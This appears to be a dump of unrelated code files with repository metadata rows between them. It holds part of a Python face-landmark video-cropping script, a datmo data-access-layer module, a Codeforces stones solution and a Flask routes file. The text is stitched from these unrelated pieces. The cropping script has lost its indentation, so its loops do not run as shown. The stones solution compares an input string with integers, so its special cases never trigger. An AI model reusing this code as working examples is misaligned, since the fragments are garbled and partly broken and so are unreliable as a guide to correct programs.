pure_video_cropped_word_chunk_samples_info_mcpwe = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
# mcpsh
pure_video_cropped_sentence_chunk_samples_info_mcpsh = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
#acpse
pure_video_cropped_sentence_chunk_samples_info_acpse = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
#acpsh
pure_video_cropped_sentence_chunk_samples_info_acpsh = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
# mcpse
pure_video_cropped_sentence_chunk_samples_info_mcpse = module_face_detection.multiple_file_camera_face_rec_and_cropping(LIST_OUTPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES, LIST_OF_INPUT_FILE_NAME = LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES, FOURCC1='M', FOURCC2='J', FOURCC3='P',FOURCC4 ='G', ADD_STR_CROPPED_FILE_NAME = '_cropped', INPUT_FILE_NAME_EXTENSION = '.mkv', OUPUT_FILE_NAME_EXTENSION = '.avi', CROPPED_WIDTH = 110, CROPPED_HEIGHT = 105, SHIFT_RIGHT = -50, SHIFT_DOWN = 0, OUTPUT_FPS = 'same', ENABLE_FACE_RECOGNITION_TRACKING_CROPING = True, WHOLE_FACE_PROFILE = False, LIPS_PROFILE = False, LOAD_FACE_LANDMARKS = True, POINT_LAND_MARK_TRACKING = False, LAND_MARK_TRACKING_NUMBER = 1, LAND_MARK_LIP_TRACKING = True, CAPTURE_FACE_LANDMARKS = True, DISPLAY_FACE_LANDMARKS = False, SAVE_LANDMARK_TRACKING_RESULTS = False, SAVE_LANDMARK_TRACKING_RESULTS_NAME = 'Record', SAVE_WHOLE = False, SAVE_CROPPED = True, DISPLAY_WHOLE = False, DISPLAY_CROPPED = False, FUTURE_KILL_SWITCH = False, ENABLE_CUBIC_LAND_MARK_TRACKING = False, CUBIC_LAND_MARK_POINT_TOP = 34,CUBIC_LAND_MARK_POINT_LEFT = 49, CUBIC_LAND_MARK_POINT_BOTTOM = 9, CUBIC_LAND_MARK_POINT_RIGHT = 55, FLIP = True, FLIP_ARGUMENT = 1, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_START = 48, SHAPE_PREDICTOR_NUMBER_OF_LANDMARK_POINT_STOP = 68)
'''
# example of how to load a json file
# import json
# # load jason file example
# filename = '/absolute directory.json'
# with open(filename, 'r') as f:
# atpse = json.load(f)
'''
# pure video chunked and cropped
pure_video_cropped_word_chunk_samples_file_dir_acpwe = pure_video_cropped_word_chunk_samples_info_acpwe['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_word_chunk_samples_file_dir_mcpwe = pure_video_cropped_word_chunk_samples_info_mcpwe['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_acpse = pure_video_cropped_sentence_chunk_samples_info_acpse['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_acpsh = pure_video_cropped_sentence_chunk_samples_info_acpsh['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_mcpse = pure_video_cropped_sentence_chunk_samples_info_mcpse['LIST_CROPPED_VIDEO_FILENAME']
pure_video_cropped_sentence_chunk_samples_file_dir_mcpsh = pure_video_cropped_sentence_chunk_samples_info_mcpsh['LIST_CROPPED_VIDEO_FILENAME']
whole_files_name_dir = {'video_converted_to_mkv' : video_converted_to_mkv, 'video_converted_to_mkv_none_audio' : video_converted_to_mkv_none_audio, 'whole_pure_audio_file_name_dir' : whole_pure_audio_file_name_dir}
chopped_files_name_dir = {'LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES' : LLIST_INPUT_WORD_CHUNK_SAMPLES_ACPWE_FILE_NAMES
, 'LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES' : LLIST_INPUT_WORD_CHUNK_SAMPLES_MCPWE_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSH_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_MCPSE_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSH_FILE_NAMES, 'LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES' : LLIST_INPUT_SENTENCE_CHUNK_SAMPLES_ACPSE_FILE_NAMES}
chopped_pure_audio_files_name_dir = {'LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES' : LIST_OUTPUT_AUDIO_WORD_CHOPPED_ACPWE_NAMES, 'LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES' : LIST_OUTPUT_AUDIO_WORD_CHOPPED_MCPWE_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_MCPSH_CHOPPED_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_MCPSE_CHOPPED_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_ACPSH_CHOPPED_NAMES, 'LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES' : LIST_OUTPUT_AUDIO_SENTENCE_ACPSE_CHOPPED_NAMES}
chopped_pure_video_files_name_dir = {'LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES' : LIST_OUTPUT_VIDEO_WORD_CHOPPED_ACPWE_NAMES
, 'LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES' : LIST_OUTPUT_VIDEO_WORD_CHOPPED_MCPWE_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_MCPSH_CHOPPED_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_MCPSE_CHOPPED_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_ACPSH_CHOPPED_NAMES, 'LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES' : LIST_OUTPUT_VIDEO_SENTENCE_ACPSE_CHOPPED_NAMES}
chopped_cropped_pure_video_files_name_dir = {'pure_video_cropped_word_chunk_samples_file_dir_acpwe' : pure_video_cropped_word_chunk_samples_file_dir_acpwe
, 'pure_video_cropped_word_chunk_samples_file_dir_mcpwe' : pure_video_cropped_word_chunk_samples_file_dir_mcpwe, 'pure_video_cropped_sentence_chunk_samples_file_dir_mcpsh' : pure_video_cropped_sentence_chunk_samples_file_dir_mcpsh, 'pure_video_cropped_sentence_chunk_samples_file_dir_mcpse' : pure_video_cropped_sentence_chunk_samples_file_dir_mcpse, 'pure_video_cropped_sentence_chunk_samples_file_dir_acpsh' : pure_video_cropped_sentence_chunk_samples_file_dir_acpsh, 'pure_video_cropped_sentence_chunk_samples_file_dir_acpse' : pure_video_cropped_sentence_chunk_samples_file_dir_acpse}
dir_name_dictionary = {'whole_files_name_dir' : whole_files_name_dir, 'chopped_files_name_dir' : chopped_files_name_dir, 'chopped_pure_audio_files_name_dir' : chopped_pure_audio_files_name_dir, 'chopped_pure_video_files_name_dir' : chopped_pure_video_files_name_dir, 'chopped_cropped_pure_video_files_name_dir' : chopped_cropped_pure_video_files_name_dir}
variable_names_dataframe = pd.DataFrame(dir_name_dictionary)
# add a keu
# if 'c' not in d.keys():
# d['c'] = 300
# list input video file names
list_chopped_cropped_pure_video_files_name =list(chopped_cropped_pure_video_files_name_dir.values())
# list input audio file names
list_chopped_pure_audio_files_name = list(chopped_pure_audio_files_name_dir.values())
#13
# use the fps value and the land mark points to map and hence create time signals for the change of each point in the x and y axis from
cropped_chunk_info_list = [pure_video_cropped_word_chunk_samples_info_acpwe, pure_video_cropped_word_chunk_samples_info_mcpwe, pure_video_cropped_sentence_chunk_samples_info_acpse, pure_video_cropped_sentence_chunk_samples_info_acpsh, pure_video_cropped_sentence_chunk_samples_info_mcpse, pure_video_cropped_sentence_chunk_samples_info_mcpsh]
# add the time between frames in seconds. Thuse be able to create a time signal
for i in range(len(cropped_chunk_info_list)):
OUR_SAMPLE = cropped_chunk_info_list[i]
FPS_LIST = OUR_SAMPLE.get('LIST_OF_INPUT_VIDEO_FPS')
TIME_BETWEEN_FRAMES = []
for k in range(len(FPS_LIST)):
FPS_PER_SAMPLE = FPS_LIST[k]
if FPS_PER_SAMPLE == 0:
TIME_BETWEEN_FRAMES_PER_SAMPLE = 0
else:
TIME_BETWEEN_FRAMES_PER_SAMPLE = float(1/FPS_PER_SAMPLE)
TIME_BETWEEN_FRAMES.append(TIME_BETWEEN_FRAMES_PER_SAMPLE)
OUR_SAMPLE['TIME_BETWEEN_FRAMES_IN_SECONDS'] = TIME_BETWEEN_FRAMES
cropped_chunk_info_dict = {'acpwe' : cropped_chunk_info_list[0], 'mcpwe': cropped_chunk_info_list[1], 'acpse':cropped_chunk_info_list[2], 'acpsh':cropped_chunk_info_list[3], 'mcpse':cropped_chunk_info_list[4], 'mcpsh':cropped_chunk_info_list[5]}
cropped_chunk_info_list = list(cropped_chunk_info_dict.values())
# if we would like to perform this on downloaded videos. Then
FPS = 'TIME_BETWEEN_FRAMES_IN_SECONDS'
# if we would like to perform this on recorded videos. Then
#FPS = 'LIST_OF_MEASURED_FPS'
for i in range(len(cropped_chunk_info_list)):
cropped_chunk_info_list_value = cropped_chunk_info_list[i]
GET_LIST_OF_TIME_BETWEEN_FRAMES_IN_SECONDS = cropped_chunk_info_list_value.get(FPS)
GET_LIST_OF_LAND_MARK_RESULTS = cropped_chunk_info_list_value.get('LIST_OF_LAND_MARK_RESULTS')
for k in range(len(GET_LIST_OF_LAND_MARK_RESULTS)):
TIME_BETWEEN_FRAMES_IN_SECONDS_VALUE = GET_LIST_OF_TIME_BETWEEN_FRAMES_IN_SECONDS[k]
LANDMARK_DATAFRAME_VALUE = GET_LIST_OF_LAND_MARK_RESULTS[k]
LANDMARK_DATAFRAME_array = LANDMARK_DATAFRAME_VALUE.get('X-Y Land Mark Coordinates')
LENGTH_OF_LANDMARK_DATAFRAME_array = len(LANDMARK_DATAFRAME_array)
LAND_MARK_TIME_LENGTH_ARRAY = [None]*LENGTH_OF_LANDMARK_DATAFRAME_array
TIME_VALUE_IN_SECONDS = 0
for z in range(LENGTH_OF_LANDMARK_DATAFRAME_array):
LAND_MARK_TIME_LENGTH_ARRAY[z] = float(TIME_VALUE_IN_SECONDS)
TIME_VALUE_IN_SECONDS = TIME_VALUE_IN_SECONDS + TIME_BETWEEN_FRAMES_IN_SECONDS_VALUE
# Add the length values
LANDMARK_DATAFRAME_VALUE['LAND_MARK_TIME_LENGTH_ARRAY'] = LAND_MARK_TIME_LENGTH_ARRAY
#pure_video_cropped_word_chunk_samples_info_acpwe.get('LIST_OF_INPUT_VIDEO_FPS')
#cropped_chunk_info_list_value['Start Times'] =
cropped_chunk_info_dict = {'acpwe' : cropped_chunk_info_list[0], 'mcpwe': cropped_chunk_info_list[1], 'acpse':cropped_chunk_info_list[2], 'acpsh':cropped_chunk_info_list[3], 'mcpse':cropped_chunk_info_list[4], 'mcpsh':cropped_chunk_info_list[5]}
# save results
# Note at the moment there is some information lost in the saved file as we a saving a dict variable which consists of multiple other lists and dataframes
module_save_variables.save_pandas_dict_results(VAR_INPUT = cropped_chunk_info_dict, FILE_NAME = FOLDER_PATH + '/cropped_chunks_info_dict', CSV=True, TXT=True)
# Potentialy the user may descide to chop the whole video and delete all samples which fall bellow the stated threashold of LIST_RATIO_OF_DETECTED_FACES_PER_FRAME
#12 add the functionality which automaticaly deletes any video which there isn't a face detected in less than 90% of the frames
# delet unecessary variables
del extend_left_acpse
del extend_left_acpsh
del extend_left_acpwe
del extend_left_mcpse
del extend_left_mcpsh
del extend_left_mcpwe
del extend_right_acpse
del extend_right_acpsh
del extend_right_acpwe
del extend_right_mcpse
del extend_right_mcpsh
del extend_right_mcpwe
del i
del k
del z
del shift_right_or_left_acpse
del shift_right_or_left_acpsh
del shift_right_or_left_acpwe
del shift_right_or_left_mcpse
del shift_right_or_left_mcpsh
del shift_right_or_left_mcpwe
del start_index_acpse
del start_index_acpsh
del start_index_acpwe
del start_index_mcpse
del start_index_mcpsh
del start_index_mcpwe
del stop_index_acpse
del stop_index_acpsh
del stop_index_acpwe
del stop_index_mcpse
del stop_index_mcpsh
del stop_index_mcpwe
del LANDMARK_DATAFRAME_array
del LENGTH_OF_LANDMARK_DATAFRAME_array
### END ###
| 70.80799 | 1,331 | 0.834804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18,804 | 0.342221 |
63561f96997f9bab466f2fe72890e847cd62196a | 9,462 | py | Python | datmo/core/storage/local/dal.py | awesome-archive/datmo | 72ea51c28a9947e24a464395bb0136b39eb6001a | [
"Apache-2.0"
] | 331 | 2018-03-30T14:33:59.000Z | 2022-01-10T19:43:32.000Z | datmo/core/storage/local/dal.py | KIMS-Github/datmo | a456d196006b67ce56af96cb4900682eab747bef | [
"MIT"
] | 274 | 2018-04-08T17:12:44.000Z | 2020-07-29T02:45:22.000Z | datmo/core/storage/local/dal.py | KIMS-Github/datmo | a456d196006b67ce56af96cb4900682eab747bef | [
"MIT"
] | 28 | 2018-05-03T21:57:22.000Z | 2020-12-31T04:18:42.000Z | import os
from kids.cache import cache
from datetime import datetime
from datmo.core.util.i18n import get as __
from datmo.core.entity.model import Model
from datmo.core.entity.code import Code
from datmo.core.entity.environment import Environment
from datmo.core.entity.file_collection import FileCollection
from datmo.core.entity.task import Task
from datmo.core.entity.snapshot import Snapshot
from datmo.core.entity.user import User
from datmo.core.util.exceptions import InputError, EntityNotFound, MoreThanOneEntityFound, DALNotInitialized
from datmo.core.util.misc_functions import create_unique_hash
from datmo.core.storage.driver.blitzdb_dal_driver import BlitzDBDALDriver
class LocalDAL():
"""
LocalDAL is a local DAL object that stores info locally. DAL stands for 'data access layer' and serves as a storage for
all entities.
Parameters
----------
driver_type : str
type of driver to pull from
driver_options : dict
options for the DALdriver class
driver : datmo.core.storage.driver.DALDriver, optional
Instantiated DAL driver used for backend storage for entities
Attributes
----------
driver_type : str
driver_options : dict
driver : datmo.core.storage.driver.DALDriver
Instantiated DAL driver used for backend storage for entities
is_initialized : bool
model : ModelMethods
code : CodeMethods
environment : EnvironmentMethods
file_collection : FileCollectionMethods
task : TaskMethods
snapshot : SnapshotMethods
user : UserMethods
Methods
-------
init()
initialize the dal
"""
def __init__(self, driver_type, driver_options, driver=None):
self.driver_type = driver_type
self.driver_options = driver_options
self.driver = driver
self._is_initialized = self.is_initialized
@property
def is_initialized(self):
if os.path.isdir(self.driver_options['connection_string']):
self._is_initialized = True
# set the driver so it is available
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
return self._is_initialized
self._is_initialized = False
return self._is_initialized
@property
def model(self):
"""Model CRUD methods
Returns
-------
ModelMethods
Specific set of CRUD functions for model
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return ModelMethods(self.driver)
@property
def code(self):
"""Code CRUD methods
Returns
-------
CodeMethods
Specific set of CRUD functions for code
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return CodeMethods(self.driver)
@property
def environment(self):
"""Environment CRUD methods
Returns
-------
EnvironmentMethods
Specific set of CRUD functions for environment
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return EnvironmentMethods(self.driver)
@property
def file_collection(self):
"""FileCollection CRUD methods
Returns
-------
FileCollectionMethods
Specific set of CRUD functions for file collection
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return FileCollectionMethods(self.driver)
@cache
@property
def task(self):
"""Task CRUD methods
Returns
-------
TaskMethods
Specific set of CRUD functions for task
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return TaskMethods(self.driver)
@cache
@property
def snapshot(self):
"""Snapshot CRUD methods
Returns
-------
SnapshotMethods
Specific set of CRUD functions for snapshot
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return SnapshotMethods(self.driver)
@cache
@property
def user(self):
"""User CRUD methods
Returns
-------
UserMethods
Specific set of CRUD functions for user
Raises
------
DALNotInitialized
"""
if not self.is_initialized:
raise DALNotInitialized()
return UserMethods(self.driver)
def init(self):
if not self.driver:
if self.driver_type == "blitzdb":
self.driver = BlitzDBDALDriver(**self.driver_options)
class EntityMethodsCRUD(object):
def __init__(self, collection, entity_class, driver):
self.collection = collection
self.entity_class = entity_class
self.driver = driver
def get_by_id(self, entity_id):
obj = self.driver.get(self.collection, entity_id)
return self.entity_class(obj)
def get_by_shortened_id(self, shortened_entity_id):
obj = self.driver.get_by_shortened_id(self.collection,
shortened_entity_id)
return self.entity_class(obj)
def create(self, datmo_entity):
# translate datmo_entity to a standard dictionary (document) to be stored
if hasattr(datmo_entity, 'to_dictionary'):
dict_obj = datmo_entity.to_dictionary()
else:
dict_obj = self.entity_class(datmo_entity).to_dictionary()
# create a unique hash from misc_functions.py
# TODO: find efficient way to get previous hash for entity
# latest_entity = self.query({"id": latest})
# dict_obj['id'] = create_unique_hash(base_hash=latest_entity['id'])
dict_obj['id'] = dict_obj['id'] if 'id' in dict_obj.keys() and dict_obj['id'] else \
create_unique_hash()
response = self.driver.set(self.collection, dict_obj)
entity_instance = self.entity_class(response)
return entity_instance
def update(self, datmo_entity):
# translate datmo_entity to a standard dictionary (document) to be stored
if hasattr(datmo_entity, 'to_dictionary'):
dict_obj = datmo_entity.to_dictionary()
else:
if 'id' not in list(datmo_entity) or not datmo_entity['id']:
raise InputError(__("error", "storage.local.dal.update"))
# Aggregate original object and new object into dict_obj var
new_dict_obj = datmo_entity
original_datmo_entity = self.get_by_id(datmo_entity['id'])
dict_obj = {}
for key, value in original_datmo_entity.to_dictionary().items():
if key in list(new_dict_obj):
dict_obj[key] = new_dict_obj[key]
else:
dict_obj[key] = getattr(original_datmo_entity, key)
# set updated_at always
dict_obj['updated_at'] = datetime.utcnow()
response = self.driver.set(self.collection, dict_obj)
entity_instance = self.entity_class(response)
return entity_instance
def delete(self, entity_id):
return self.driver.delete(self.collection, entity_id)
def query(self, query_params, sort_key=None, sort_order=None):
return [
self.entity_class(item) for item in self.driver.query(
self.collection, query_params, sort_key, sort_order)
]
def findOne(self, query_params):
results = self.query(query_params)
if len(results) == 0:
raise EntityNotFound()
if len(results) > 1:
raise MoreThanOneEntityFound()
return results[0]
#
# https://stackoverflow.com/questions/1713038/super-fails-with-error-typeerror-argument-1-must-be-type-not-classobj
#
#
# Datmo Entity methods
#
class ModelMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(ModelMethods, self).__init__('model', Model, driver)
class CodeMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(CodeMethods, self).__init__('code', Code, driver)
class EnvironmentMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(EnvironmentMethods, self).__init__('environment', Environment,
driver)
class FileCollectionMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(FileCollectionMethods, self).__init__('file_collection',
FileCollection, driver)
class TaskMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(TaskMethods, self).__init__('task', Task, driver)
class SnapshotMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(SnapshotMethods, self).__init__('snapshot', Snapshot, driver)
class UserMethods(EntityMethodsCRUD):
def __init__(self, driver):
super(UserMethods, self).__init__('user', User, driver)
| 29.84858 | 123 | 0.629148 | 8,603 | 0.909216 | 0 | 0 | 3,031 | 0.320334 | 0 | 0 | 3,181 | 0.336187 |
635954cccfa45bc4cb0b41a99fdee38be3ae1775 | 358 | py | Python | CodeForces/StonesOnTheTable/StonesonTheTable.py | GeorgianBadita/algorithmic-problems | 6b260050b7a1768b5e47a1d7d4ef7138a52db210 | [
"MIT"
] | 1 | 2021-07-05T16:32:14.000Z | 2021-07-05T16:32:14.000Z | CodeForces/StonesOnTheTable/StonesonTheTable.py | GeorgianBadita/algorithmic-problems | 6b260050b7a1768b5e47a1d7d4ef7138a52db210 | [
"MIT"
] | null | null | null | CodeForces/StonesOnTheTable/StonesonTheTable.py | GeorgianBadita/algorithmic-problems | 6b260050b7a1768b5e47a1d7d4ef7138a52db210 | [
"MIT"
] | 1 | 2021-05-14T15:40:09.000Z | 2021-05-14T15:40:09.000Z | def main():
_ = input()
string = input()
if _ == 0 or _ == 1:
return 0
if _ == 2:
if string[0] == string[1]:
return 1
return 0
last = string[0]
cnt = 0
for i in range(1, len(string)):
if string[i] == last:
cnt += 1
last = string[i]
return cnt
print(main())
| 15.565217 | 35 | 0.432961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
635a1b194d242f8ac83aa8d4f19dfd8d49c42b24 | 573 | py | Python | app/routes.py | valtemirprocopio/forms | 05d819aad3d8c32c87b0f62a3c8e2b6fda8aa26e | [
"MIT"
] | null | null | null | app/routes.py | valtemirprocopio/forms | 05d819aad3d8c32c87b0f62a3c8e2b6fda8aa26e | [
"MIT"
] | null | null | null | app/routes.py | valtemirprocopio/forms | 05d819aad3d8c32c87b0f62a3c8e2b6fda8aa26e | [
"MIT"
] | null | null | null | from app import app
from flask import render_template, flash, redirect, url_for
from app.forms import LoginForm
@app.route('/')
@app.route('/index')
def index():
return render_template('index.html')
@app.route('/contato', methods=['GET','POST'])
def contato():
form = LoginForm()
if form.validate_on_submit():
mensagem = flash('A mensagem foi enviada com sucesso.')
return redirect('/index')
return render_template('contato.html', form=form)
@app.route('/features')
def features():
return render_template('features.html')
| 22.92 | 63 | 0.678883 | 0 | 0 | 0 | 0 | 443 | 0.773124 | 0 | 0 | 129 | 0.225131 |
635c827babc0af053e69c6189ed75cae75ad2a0f | 336 | py | Python | Python/Math/Armstrong-Number/armstrong-number.py | manoj-paramsetti-testing/Algorithm-Warehouse | 89c41146a1c444605830016319e00c343fdbe154 | [
"MIT"
